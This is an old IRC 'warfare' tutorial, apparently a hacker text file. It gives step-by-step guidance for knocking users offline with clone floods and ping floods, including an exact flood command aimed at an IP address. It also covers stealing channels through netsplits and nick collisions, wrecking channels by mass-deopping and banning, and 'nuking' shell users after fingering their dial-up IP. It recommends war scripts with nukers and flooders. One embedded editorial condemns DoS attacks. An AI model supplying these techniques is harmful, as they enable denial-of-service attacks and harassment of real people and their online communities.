You will need a flood program like "Floods". (Ask me if you want it)
After running it or any other flooding script that is based on clone loading you connect the clones to the target IRC server. (~6 clones should do the job)
Before we continue, I want to explain you how this works.
Each user on the IRC got something called SendQ and RecvQ. They contain the data the user is sending / receiving.
They also have a maximum value. If this value is achieved, the server will automatically close their connection.
Flood programs and flood scripts load clones (computer-operated IRC "users") and start sending lot of crap to the target nick, causing his RecvQ to fill up and he should get disconnected :).

So after you launched the program, you start flooding. I can't tell you exactly how because there are lot of programs and I can't explain you how every one works, but I can help you via my e-mail: talrun@actcom.co.il
There are also more advanced programs that support clone loading through firewalls and Wingates. When a user loses his connection to the IRC because of such an attack, everyone on every channel he was present on will see the following:
*** Quits: ^TCG^ (Excess Flood)

Another way of disconnecting a user from the IRC is exploiting a bug in his OS. You need to determine his OS and start this attack on him. There are lots of different types of attacks. To learn about them, read R a v e N's DoS tutorial.

[Can I get caught and will I?]
First of all, it depends on what you are going to do or already did.
When you are going to take over a channel for example, if you are doing it without hiding your identity first (See previous chapter) you can get caught but nothing will probably happen to you. You might receive a DoS attack that can terminate your IRC session or lag you like hell. If you are using a bouncer for example, you won't get caught for this. But if you "click" someone and he logs the packets he can e-mail your ISP with your IP and they might kill your account.

If you are killing someone with a netsplit (See next chapter) you won't get caught and nothing will happens to you since you haven't done anything illegal.

Also, it is good to know as much as possible about your target. If you see some one that is named 'Ass^Hole' for example, you have no good reason to go packet him or flood him. He might have access to an OC3 or a DS-3 line (Extremely fast connections to the Internet) and he might also detect your attacks and start flooding you in return. Trust me, you don't want this to happen. One day my T3 line got ping flooded from an OC3 line and it stopped working for about 30 minutes. Just for your information, OC3 can transfer up to 255Mbit and a T3 can transfer up to 9Mbit (I think). If such a line will flood your computer you don't stand a chance.

[What are netsplits and how can they help me?]
Large IRC networks consist of various servers. A NetSplit occurs when a link between one of the servers and the others gets broken because of lag or other reasons. All users that were connected to this channel will be separated from the others as long as the netsplit occurs.
Therefore, lots of channels become empty, and get closed. When you will join a channel that became empty, or you left only 1 user in the channel and you will cycle it, there is a chance that you will obtain the channel operator status (OP, @).
On a NetJoin (When the server relink to the entire network again) you might still have the channel operator status. On new servers, you won't get the operator status when the network is in a spilt mode, but if you could find an old server or network you just might get lucky. Breaking a connection between 2 servers by yourself is very difficult. You need to pick 2 servers that are already lagged and start ping-flooding the target server from a fast connection.
Once a netjoin occurs, it is recommended to have a war script (we'll get to those) that will DeOP everyone on the channel so other OPs won't be able to DeOP you.

NetSplits can also let you disconnect a user from the IRC. Let's say you want to disconnect a user named 'Lamer'. When a netsplit occurs, there are two different possibilities:
1) The target user ('Lamer', in our case) was on the server that did the netsplit and has left the IRC network, but will return once a netjoin occurs (shouldn't take a lot of time).
2) The user is still on the network and has nothing to do with the netsplit.
If number 1 occurs then all you need to do is connect to the network using his nickname and wait for the netjoin. When the servers will re-link they will see that there are 2 users with the same nickname. Such thing cannot possibly happen, so one user must be killed. The user that was NOT on the network, (which means he was on the splitted server) will probably get killed. If option 2 occurs then all you can do is to put a clone (open another IRC sesssion), connect to the splitted server and change your nick to his nick. When the servers will rejoin there is a small chance that he will get killed, so cross your fingers. :)

Now, for the 1,000,000$ question: how do I detect a netsplit? You can detect a netsplit if the user(s) quit message is "Server1 Server2". For example:

Lamar has quit IRC (irc.magic.com irc.freei.net)                             |             |_Server2                             |_Server1
This message tells you that there is a split between irc.magic.com and irc.freei.net
The second server (Server2) is the server that left the net.

[Channel Takeovers]
Channel takeovers are used to take a channel from a user, and prevent him from reentering the channel or gaining operator status in the channel. The first thing you need to do is to get ops. Here are 4 ways to get ops:
1. Via a NetSplit. (might take a lot of time)
2. Asking one of the ops to let you be an op (Who knows? You might get lucky).
3. Running a bot on your computer or on a shell account and telling the other ops that it is online 24 hours a day, and ask them to op it. They might do it, then tell the bot to op you.
4. You can always lure the other ops into giving you op by telling them that you will advertise their channel and bring them users and you might earn the ops status.
You can do nothing without the OP status. Here is what you do after you got an op and you want to close they're channels:
1. First, mass de-op all the users so they won't kick or ban you. There are a lot of scripts out there that will do this for you.
2. Then place a ban on *!*@*
3. Mass-Kick the channel (also with a script)
4. After this set the following modes: +smilk 1 1 (you type /mode #Channel +smilk 1 1)
5. You took over the channel! :)
There is a problem with this, when you will leave the channel he will get empty and then closed. The only solution for this is placing a 24/7 (24 hours a day, 7 days a week) bot in the channel. If channel services are available on this network (Like in DALnet), you can register the channel if no one else have done this already.
If you took over a registered channel, you will have a problem keeping it because Channel Services can give the channel back to its legal owner with no problem.

[How to completely ruin a channel]
Here are some possible ways to completely ruin a channel:
1) Turning the channel into an invite-only channel, so only people who were invited (to invite people, type /invite nick) can join.
2) Making the channel password-protected.
3) Making sure that you are the only OP in the channel and then turning the channel into moderated mode and then mass-devoicing everyone. In moderated mode, only voiced users (people with a little + in the beginning of their nick. To voice people, do /mode #channel +v nick or -v to devoice) can talk. That way, users will be able to see who is on the channel (note: you can see who's on a channel without joining it by typing /names #channel), but they won't be able to chat, and they will have to listen to you... :)

[Some expansion about RAW sessions]
Too lazy to read RFC ?
Well, this is the "SUMMARY" of rfc1459 (IRC Protocol). Hopefully after reading this you'll have better understanding of how the protocol work (hey... don't just use it... try to understand how it work). Yeah... this is also how some people spoof their IP by telneting from some restricted shell account with no IRC client access.

[Connecting to the IRC daemon]

Telnet/netcat (yep... we're gonna use a raw socket) to the IRC port (6667/6668..etc) of the IRC server.

eg <:> telnet irc.dal.net 6667

Send your nick & username to be recognized after u got connected using the user command in this form "user ".

eg <:> user nobody localhost localhost :I'm nobody nick nobody

-------------------------[!! NOTE !!]-------------------------
At any time if your receive anything like this
ping :1234567 <-- The sequence number change all the time
or
ping :192.0.0.1 <-- Some IP address

You must send back the number with a pong
eg <:> pong :1234567
or
pong :192.0.0.1

If you don't pong back, you'll be disconnected with a ping timeout error.
---------------------[!! END OF NOTE !!]-------------------

[Exploring some basic commands]

Ok, after the nick & user commands you can start chatting now. Type join #channel (Without the /) to join #channel.

(Yea... most commands you use in your BitchX or mIRC client can also be
used here too...just don't include the /
eg: part #channel
quit :I'm out
etc... )

To send your message to a channel, use the privmsg command.

eg <:> privmsg #channel : Hi guys...Sup? (Dont forget the ":" if you are going to send more then one word)

This will send "Hi guys...Sup?" to #channel

To send a private message to a user:
eg <:> privmsg nickname : HI ya

This will send "HI ya" to nickname.

To set a mode on a channel you simply type mode #channel mode.
For example, MODE #Channel +b 192.114.*.* will ban everyone that they're IP begin with 192.114.

[Fun stuff to do]

If you get something like this ":nick!user@ip-address PRIVMSG your-nick :_VERSION_"
this means that nick is trying ctcp/version you. This command is used to find out your version.
Send the version back using the NOTICE command... it could be anything you want.

eg : NOTICE nick :_VERSION Telnet version 0.1 :) _

This will send "Telnet version 0.1 :)" as the version reply.

[Faking /CTCP Replies]

Now many of you guys chat and have various people always doing{Client for Client Protocol} CTCP replies, ie. VERSION, TIME, FINGER, PING replies on you. These replies can get you in a lot of trouble, mainly its a way for people to gather information about you then start up an attack. Now it is time to change the replies your mirc will give in a way to cause the other end to be fooled. Well this topic has been covered by many writers and warscript developers, but many don't know about changing the replies to their advantage, well look no further, here we go!

One of the most devistating attacks can come from a VERSION reply.

To do a ctcp version reply on a user, all you have to do is type:
"/ctcp VERSION " This will return the nick's irc client. Now you may ask why is that important? Well lets say your using mirc 5.7x which suffers from heap overflow of 217 bytes, and 5.8 heap overflow of 226 bytes by knowing your version an attacher already knows which operating system your using and a version, so they can hack you without a trojan and you won't know it happened.
Lets kill the version reply to either give a fake reply or no reply at all so they can sit there waiting, lol.
Okay you will need a hex editor for this, I recomment Hiew, get it
here!
-make a backup of your mirc32.exe.
-install hiew, load it up, once you have clicked mirc32.exe now you will see some garbage, click F7 that should popup the search box, type in VERSION you should be able to find the reply something like mIRC32 v5.8 K.Mardam-Bey. Now just delete the reply. If you have trouble doing it with Hiew then get another hex editor, there are many around but its the best. So save and exit. Now you can chose to have no Version reply to make your attacker suffer from waiting when there isn't going to be a reply or you can fake your reply to trick him.
Lets trick the attacker:

Load up you mirc, then goto the tools menu, then click " Remote ". There you should see a box,
now simply write this mini script,

ctcp 1:VERSION:{
.notice $me Recieved CTCP VERSION from $nick $+ / $+ $site
ctcpreply $nick VERSION "write your reply here, make it funny" | halt
}

So now we have faked our ctcp reply it should look like this, if we faked it to have no reply

/ctcp Mikkkeee VERSION

-> [Mikkkeee] VERSION
-
[Mikkkeee VERSION]
-

Well now the attacker will keep waiting and waiting.

Lets fake some more,
Another ctcp reply that can be of usage is /ctcp PING
This reply of your ping will tell the attacker the speed of your connection and if your lagging, wink wink he might want to do a dos attack and boot you, so lets fake the reply to our advantage.
Same as above write this mini script in our tools, then "remote"

ctcp 1:PING:{
ctcpreply $nick PING "your pings number in sec" | halt
}

Usually I have mine set to 1 sec , but you can make it funny like 690263165 sec, which would leave the attacker fooled/confused.

Another reply that can cause you a bit of harm is /ctcp TIME which will send the other user, your local time/date. This is very bad cause if your busy trying to bounce your ip over wingates and proxys and now your ip is somewhere in Asia, and someone does ctcp TIME then they will know your true location in the world, which can hurt your spoofing tricks.
So lets fake it to our advantage!

ctcp 1:TIME:{
ctcpreply $nick TIME "your new time" | halt
}

your new time can be something like, Tue Jun 12 22:23:17 1989 be creative!

Another ctcp reply that can be used to gather some info on you is /ctcp FINGER
its not a big deal but it simply replies what you have told it to reply, so just fake everything.
hope that helps!

[How to spoof via https proxys]

Now this idea is very creative, and I just found a little program that you can use to do it. It is called ThroughTheFire 0.9 which is able to spoof your ip via https proxys. It is a new innovation in spoofing, lol !You can also use this program to spoof telnet and i guess ftp sufing. Well all you have to do now is find working https proxy lists. To do so just type in ww.altavista.com
+"Https proxy" and you should get some results, maybe not working results. Read the
Search Engines Ripped Apart tutorial to see other methods on using search engines.

[War Scripts]
War scripts are usually scripts for IRC clients that contain features like Mass DEOP / Kick, channel takeover options, nukers, flooders, clones and sometimes bots. Some scripts even contain some nice and funny features that don't necessarily have something to do with IRC Warfare.

In this section I will briefly cover some of the more known war scripts and their features.

7th Sphere Script (c) 1996-1997 7th Sphere Enterprises
Support@7thSphere.com - http://www.7thSphere.com
Pros: Easy setup, Nice protections, Automatically runs the Click nuker and fills-in all the needed values.
Cons: Protections are not customizable enough. Channel Takeover doesn't mass kick / ban the channel.

TRiBE (t7) By kefz(tribe)
Pros: Excellent protections, Excellent socket flood clones and firewall flood clones. The best I have ever seen! Comes with a great set of utilities. Can automatically run click with all the options pre-configured. Excellent set of scripts / clients / bots exploits / backdoors.
Cons: None! Go get this script now!

Peace and Protection 4.0
Pros: Get it and see for your self, simply a work of art!
Cons: Too many good tools, lol

Wang Script 3.5 pro
Pros: Wang Clone, Trojan scan, Password protection, nickname find, ctcp masking, email checking/sending, clone scanner, anti takeover, info finder, takeover, fake dcc's, telnet, wartools addons.
Cons: NONE!

[Editorial - IRC wars, another perspective]
Note: Most of this is taken from an article that was written by Ntd (ntd@mirc.net). I feel that this article has the best perspective about the IRC wars.
Note 2: If you are a newbie and you think IRC wars are a great form of hacking, and doing complex attacks you might want to skip this chapter and read it another time.

IRC WAR? A LOAD OF SILLY NUKES
Right, first things first, nukes - or properly, Denial of Service (DoS) attacks - are technically nothing to do with IRC war. They operate directly from the attacker to the victim's IP, and IRC comes into it only inasmuch as it gives the attacker a ready source of IP addresses to attack, and perhaps a "motive" for doing it (e.g, "they banned me!"). But, attackers could just as easily collect IPs from services such as ICQ (which, incidentally, has to be one of the most idiotically insecure protocols ever invented, yet many people who bemoan IRC attack happily run ICQ, and probably don't even check the option to hide their IP which is useless anyway because there are lot of patches that will always show you the IP even if the user chose to hide it).

IRC WAR DOESN'T HELP IMPROVE SECURITY
Surely the stupidest argument against IRC war, is that unlike other forms of hacking, it does not help anybody because it doesn't contribute to increased security. There is a mass of evidence showing quite clearly that this is not the case. Why did Microsoft release a winsock that was not vulnerable to the port 139 OOB nuke? Because that nuke became so widely abused. Why do current versions of mIRC have an option to only enable the identd server during connection? Because mIRC 5.3 had an ident exploit with which mIRC could be crashed. Why, in fact, have flood attacks become so obsolete? Because ircds now contain anti-flood code written directly in response to flood abuse. Of course these attacks are irritating and disruptive at the time, but in the long term they have undoubtedly led to more secure code in operating systems, clients and irc daemons.

IRC WAR IS NOT REAL HACKING
Again, this stems from a misunderstanding of what IRC war is. Essentially there are two types: TCP/IP attacks (ICMP nuke, smurf, fraggle, ping of death) and ircd based attacks (nick collisions, lag collisions, serverops, hacking o:lines, bogus bans). While the first category are almost exclusively "lame cracking" (that is, the user needs only to download a program and can then use it without any actual knowledge), the second category is more ambiguous. I know one person who finds many exploits by working with the ircd code (which is of course almost always free for download) - and finding bugs by working with the source is as "real" as hacking can get. Within a few days of their implementation he found ways of bypassing the ircnet ircd patches designed to protect against open socks servers and deliberate nick collisions. He even found a method by which a normal client could completely crash a server remotely. And what did he do with this knowledge...?

DOS ATTACKS
Yes, they are illegal, and yes they are disruptive. Furthermore, many DoS attacks affect many more people than those targeted, the most obvious example being the smurf attack. I am one of a group of friends who run a few of the biggest channels on ircnet, and these channels are regularly attacked by war groups intent on taking them. I make no exaggeration when I say that several times a week, if not everyday, members of the original channel opers complain that they are being smurfed by members of groups attempting to take the channel. These smurf attacks are capable of taking down entire ISPs and that IRC warriors recklessly use these attacks against single users just to take an irc channel is utterly inexcusable in my opinion.

MOTIVATION
While there are some IRC warriors / hackers like the individual I described above, it is sadly true that there are many more who are acting from more dubious motives. To the people who resort to floods, nukes and such tools just because they are banned from channels, I say: you need to get out more. What, then is my basic point? My conclusion is that IRC abuse and hacking is like any other branch of hacking - it ranges from the incredibly basic and lame to the actually quite skilled and beneficial. At the one end are the classic 13 year old hax0r wannabes with their CLICK.EXE, and I am in no way suggesting these people's behaviour should be excused or tolerated. However, I urge you all to be aware that at the other end of the scale exist talented, knowledgeable hackers discovering and revealing bugs in clients, OSes and ircds by a variety of methods and in doing so making IRC more secure for all of us.

[Some intresting articles by Packet]

=[Ping Flooding]=

1. =What is a ping?=
A ping is a small file (often 32 bytes) that is sent to another computer online,
in which the other computer replys. Basicly it is saying "hello" to another
computer. With this is also shows how long it took for the ping to get there
and back.

2. =So why is this usefull to me?=
Well it can and it can not be usefull. If you are going to play a game like
quake/quake2 on a server, the faster the ping gets there and back the better.
Also, if you are on a fast connection you can nock people of there ISP
temperarily. This is called ping flooding, and can work very well. The best
thing to flood with is a T1 or better. Even if you don't have more than a
28.8 you can lag or kill someone. Here is an example of how ping works


C:\ping 24.131.12.124

this would send a few 32byte packets to that host. Now, this won't do much
by itself...but there are more features to pinging that make it very usefull.
this is the command I often use

C:\ping -l 2800 -t -w 2000 24.131.12.124
(good for 28.8 users)

-l is the size of the packet to send, generaly you want to keep trying higher
numbers till you find the very most there connection can take....soon they
will be to lagged to do much, or get killed. -w is how long it waits till it
decides to time out.... -t keeps pinging the IP untill you hit CTRL+Break

there are some other cool switches like -n wich echo floods them, and -v
witch specifys the Terms Of Service

=[Net Splits]=

1. =[What is a NetSplit]=
The large irc servers work, is they link together to provide less lag and a
local server to many people. They link together so that people can talk and
do what ever and not have to be on the same server. What a netsplit is, is
when one server is lagged enough it breaks off from the rest of the servers
then becoming its own stand alone server untill it merges again.

2. =[Why Does this matter?]=
Well it can and it can't matter....It is possible to take over a channel
through netsplits. So it can matter if you want to protect yourself from
this, or do it yourself.

3. =[How do I protect myself?]=
The only way is to have netsplit protection. Alot of people do not like this
script, and I do not recomend using it unless you think someone is trying to
take your channel. When servers merge it trys to restore the settings as it
was before the split. So if you were a channel operator the server would OP
you, reset the modes etc etc. When someone takes a channel by a netsplit they
get opped by the server, so the script deops anyone who is opped by the server.
If you do use this script, make sure people can op themselves automaticly by
sending you a message. ...

4. =[How do I take a channel through this?]=
First you need a link looker, (which comes with this script). What a link
looker does is search for servers that are about to or have broken off. When
you find a server that has broken off, you need to quickly join that server
and go into the channel you want to take over. If no one else is on that server
you will be a channel operator. But this is not all you have to do, because
when the servers merge again it will deop you. You need to run the Dysnch script
which will fill the channel with bans and diffrent modes. Hopefully it will
screw up the already screwed channel enough that when the merge happens it
thinks you were a channel operator and you keep your OPS. Then you need to
quickly run the takeover script so that none of the netsplit protection (if
there are any) scripts deop you.

=[Advanced Nuking]=

Nuking is fun for the whole family, but sometimes it's not just "wham bam thank you ma'am". On
occasion, it requires you to be a little creative to successfully nuke someone. hopefully
we will give you some ideas on how to become a pheared nuker.

** Open ports:
In order to become a successful nuker, you must learn to find as much information about your
target as possible. One of the most important elements to nuking is finding the right ports
to nuke. the default IRC server ports are 6660-6669, with 6667 being the most commonly used.
One thing you may discover throughout your nuking 'career' is that most servers offer different
ports that are open for IRCing. The easiest way to find out the open ports is to check the
Message Of the Day, for 90% of all IRC servers will list their open ports in the motd. To get
the message of the day simply type '/motd irc.server.net'. This will display the motd and allow
you to find the open ports (usually). Now you can nuke these ports, increasing your chances of
success.

** Their Connection:
Another thing you may want to do is find out whether your target is on a shell account, or a
dial-up account. Under normal circumstances, dial-up users are easier to nuke then shell accounts
for reasons we won't go into right now. To find out which they are using, simply take the last
part of their IP and try to visit to the ISP's homepage. Again, there are many servers that
will describe their services on their web-page. Usually, if their ip is two or three legible
words only interupted by a period, then it is a shell. For instance,
"jkrondike@mainsys.postex.net" would most likely be a shell account, while
"yourmom@modem29.er.actil.net" is usually a dial-up.

** Nuking Shell Users:
If you're using windows, you should download a program that will allow you to finger a server.
Cyberkit is a good program, for it has Ping, Finger, Traceroute, etc.
get it at http://www.ping.be/cyberkit/cyber.zip, or go find one of your own. there are hundreds
to choose from. (no we're not being endorsed by cyberkit, it's just a kickass proggie)
Most shell account users will login from a dial-up account, and if finger is running on their
shell, it should display the dial-up IP address. Finger the server and once you know this, use
your nuker to disconnect them from their shell by replacing the IRC server with their shell
account address, and use the IP you found through finger as the client. Use ports 22 24 as the
server ports, in place of 6660 6669. Port 23 is the default telnet port, so nuking from 22 to 24
will effictivly disconnect them from their shell account. this usually causes your target to
quit irc with "Where did my controling terminal go?" quit message. it's pretty funny when it
works.